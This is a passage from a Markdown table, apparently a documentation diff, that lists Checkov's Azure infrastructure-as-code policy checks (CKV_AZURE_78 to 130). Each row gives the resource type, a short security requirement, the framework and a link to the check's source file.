[AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1799 | CKV_AZURE_78 | resource | azurerm_linux_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1800 | CKV_AZURE_78 | resource | azurerm_windows_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | +| 1801 | CKV_AZURE_79 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for SQL servers on machines | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py) | +| 1802 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | arm | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | +| 1803 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | +| 1804 | CKV_AZURE_80 | resource | azurerm_app_service | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | +| 1805 | CKV_AZURE_80 | resource | azurerm_windows_web_app | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | +| 1806 | CKV_AZURE_81 | resource | azurerm_app_service | Ensure that 'PHP version' is the latest, if used to run the web app | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py) | +| 1807 | CKV_AZURE_82 | resource | Microsoft.Web/sites | Ensure that 'Python version' is the latest, if used to run the web app | arm | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py) | +| 1808 | CKV_AZURE_82 | resource | Microsoft.Web/sites | Ensure that 'Python version' is the latest, if used to run the web app | Bicep | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py) | +| 1809 | CKV_AZURE_82 | resource | azurerm_app_service | Ensure that 'Python version' is the latest, if used to run the web app | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py) | +| 1810 | CKV_AZURE_83 | resource | Microsoft.Web/sites | Ensure that 'Java version' is the latest, if used to run the web app | arm | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py) | +| 1811 | CKV_AZURE_83 | resource | Microsoft.Web/sites | Ensure that 'Java version' is the latest, if used to run the web app | Bicep | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py) | +| 1812 | CKV_AZURE_83 | resource | azurerm_app_service | Ensure that 'Java version' is the latest, if used to run the web app | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py) | +| 1813 | CKV_AZURE_84 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Storage | arm | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py) | +| 1814 | CKV_AZURE_84 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Storage | Bicep | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py) | +| 1815 | CKV_AZURE_84 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Storage | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py) | +| 1816 | CKV_AZURE_85 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Kubernetes | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py) | +| 1817 | CKV_AZURE_86 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Container Registries | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py) | +| 1818 | CKV_AZURE_87 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Key Vault | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py) | +| 1819 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | arm | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | +| 1820 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | +| 1821 | CKV_AZURE_88 | resource | azurerm_app_service | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1822 | CKV_AZURE_88 | resource | azurerm_linux_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1823 | CKV_AZURE_88 | resource | azurerm_windows_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | +| 1824 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | arm | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | +| 1825 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | +| 1826 | CKV_AZURE_89 | resource | azurerm_redis_cache | Ensure that Azure Cache for Redis disables public network access | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py) | +| 1827 | CKV_AZURE_91 | resource | azurerm_redis_cache | Ensure that only SSL are enabled for Cache for Redis | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py) | +| 1828 | CKV_AZURE_92 | resource | azurerm_linux_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | +| 1829 | CKV_AZURE_92 | resource | azurerm_windows_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | +| 1830 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | +| 1831 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | +| 1832 | CKV_AZURE_93 | resource | azurerm_managed_disk | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py) | +| 1833 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | arm | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | +| 1834 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | +| 1835 | CKV_AZURE_94 | resource | azurerm_mysql_flexible_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | +| 1836 | CKV_AZURE_94 | resource | azurerm_mysql_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | +| 1837 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | arm | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 1838 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 1839 | CKV_AZURE_95 | resource | azurerm_virtual_machine_scale_set | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py) | +| 1840 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | arm | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | +| 1841 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | +| 1842 | CKV_AZURE_96 | resource | azurerm_mysql_server | Ensure that MySQL server enables infrastructure encryption | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py) | +| 1843 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 1844 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 1845 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 1846 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | +| 1847 | CKV_AZURE_97 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | +| 1848 | CKV_AZURE_97 | resource | azurerm_windows_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | +| 1849 | CKV_AZURE_98 | resource | azurerm_container_group | Ensure that Azure Container group is deployed into virtual network | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py) | +| 1850 | CKV_AZURE_99 | resource | azurerm_cosmosdb_account | Ensure Cosmos DB accounts have restricted access | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py) | +| 1851 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | arm | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | +| 1852 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | +| 1853 | CKV_AZURE_100 | resource | azurerm_cosmosdb_account | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py) | +| 1854 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | arm | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | +| 1855 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | +| 1856 | CKV_AZURE_101 | resource | azurerm_cosmosdb_account | Ensure that Azure Cosmos DB disables public network access | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py) | +| 1857 | CKV_AZURE_102 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables geo-redundant backups | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py) | +| 1858 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | arm | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | +| 1859 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | +| 1860 | CKV_AZURE_103 | resource | azurerm_data_factory | Ensure that Azure Data Factory uses Git repository for source control | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py) | +| 1861 | CKV_AZURE_104 | resource | azurerm_data_factory | Ensure that Azure Data factory public network access is disabled | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py) | +| 1862 | CKV_AZURE_105 | resource | azurerm_data_lake_store | Ensure that Data Lake Store accounts enables encryption | Terraform | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataLakeStoreEncryption.py) | +| 1863 | CKV_AZURE_106 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain public network access is disabled | Terraform | [EventgridDomainNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainNetworkAccess.py) | +| 1864 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | arm | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | +| 1865 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | Bicep | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | +| 1866 | CKV_AZURE_107 | resource | azurerm_api_management | Ensure that API management services use virtual networks | Terraform | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIServicesUseVirtualNetwork.py) | +| 1867 | CKV_AZURE_108 | resource | azurerm_iothub | Ensure that Azure IoT Hub disables public network access | Terraform | [IoTNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/IoTNoPublicNetworkAccess.py) | +| 1868 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | arm | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | +| 1869 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | Bicep | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | +| 1870 | CKV_AZURE_109 | resource | azurerm_key_vault | Ensure that key vault allows firewall rules settings | Terraform | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesFirewallRulesSettings.py) | +| 1871 | CKV_AZURE_110 | resource | azurerm_key_vault | Ensure that key vault enables purge protection | Terraform | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesPurgeProtection.py) | +| 1872 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | arm | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | +| 1873 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | Bicep | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | +| 1874 | CKV_AZURE_111 | resource | azurerm_key_vault | Ensure that key vault enables soft delete | Terraform | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultEnablesSoftDelete.py) | +| 1875 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | arm | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | +| 1876 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | Bicep | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | +| 1877 | CKV_AZURE_112 | resource | azurerm_key_vault_key | Ensure that key vault key is backed by HSM | Terraform | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyBackedByHSM.py) | +| 1878 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | arm | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | +| 1879 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | Bicep | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | +| 1880 | CKV_AZURE_113 | resource | azurerm_mssql_server | Ensure that SQL server disables public network access | Terraform | [SQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLServerPublicAccessDisabled.py) | +| 1881 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | arm | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | +| 1882 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | Bicep | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | +| 1883 | CKV_AZURE_114 | resource | azurerm_key_vault_secret | Ensure that key vault secrets have "content_type" set | Terraform | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecretContentType.py) | +| 1884 | CKV_AZURE_115 | resource | azurerm_kubernetes_cluster | Ensure that AKS enables private clusters | Terraform | [AKSEnablesPrivateClusters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEnablesPrivateClusters.py) | +| 1885 | CKV_AZURE_116 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses Azure Policies Add-on | Terraform | [AKSUsesAzurePoliciesAddon.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesAzurePoliciesAddon.py) | +| 1886 | CKV_AZURE_117 | resource | azurerm_kubernetes_cluster | Ensure that AKS uses disk encryption set | Terraform | [AKSUsesDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUsesDiskEncryptionSet.py) | +| 1887 | CKV_AZURE_118 | resource | azurerm_network_interface | Ensure that Network Interfaces disable IP forwarding | Terraform | [NetworkInterfaceEnableIPForwarding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NetworkInterfaceEnableIPForwarding.py) | +| 1888 | CKV_AZURE_119 | resource | azurerm_network_interface | Ensure that Network Interfaces don't use public IPs | Terraform | [AzureNetworkInterfacePublicIPAddressId.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureNetworkInterfacePublicIPAddressId.yaml) | +| 1889 | CKV_AZURE_120 | resource | azurerm_application_gateway | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | +| 1890 | CKV_AZURE_120 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway enables WAF | Terraform | [ApplicationGatewayEnablesWAF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/ApplicationGatewayEnablesWAF.yaml) | +| 1891 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | arm | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | +| 1892 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | Bicep | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | +| 1893 | CKV_AZURE_121 | resource | azurerm_frontdoor | Ensure that Azure Front Door enables WAF | Terraform | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFrontDoorEnablesWAF.py) | +| 1894 | CKV_AZURE_122 | resource | azurerm_web_application_firewall_policy | Ensure that Application Gateway uses WAF in "Detection" or "Prevention" modes | Terraform | [AppGWUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUseWAFMode.py) | +| 1895 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | arm | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | +| 1896 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Bicep | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | +| 1897 | CKV_AZURE_123 | resource | azurerm_frontdoor_firewall_policy | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | Terraform | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontdoorUseWAFMode.py) | +| 1898 | CKV_AZURE_124 | resource | azurerm_search_service | Ensure that Azure Cognitive Search disables public network access | Terraform | [AzureSearchPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchPublicNetworkAccessDisabled.py) | +| 1899 | CKV_AZURE_125 | resource | azurerm_service_fabric_cluster | Ensures that Service Fabric use three levels of protection available | Terraform | [AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServiceFabricClusterProtectionLevel.py) | +| 1900 | CKV_AZURE_126 | resource | azurerm_service_fabric_cluster | Ensures that Active Directory is used for authentication for Service Fabric | Terraform | [ActiveDirectoryUsedAuthenticationServiceFabric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py) | +| 1901 | CKV_AZURE_127 | resource | azurerm_mysql_server | Ensure that My SQL server enables Threat detection policy | Terraform | [MySQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLTreatDetectionEnabled.py) | +| 1902 | CKV_AZURE_128 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables Threat detection policy | Terraform | [PostgresSQLTreatDetectionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgresSQLTreatDetectionEnabled.py) | +| 1903 | CKV_AZURE_129 | resource | azurerm_mariadb_server | Ensure that MariaDB server enables geo-redundant backups | Terraform | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py) | +| 1904 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | arm | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | +| 1905 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | Bicep | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | +| 1906 | 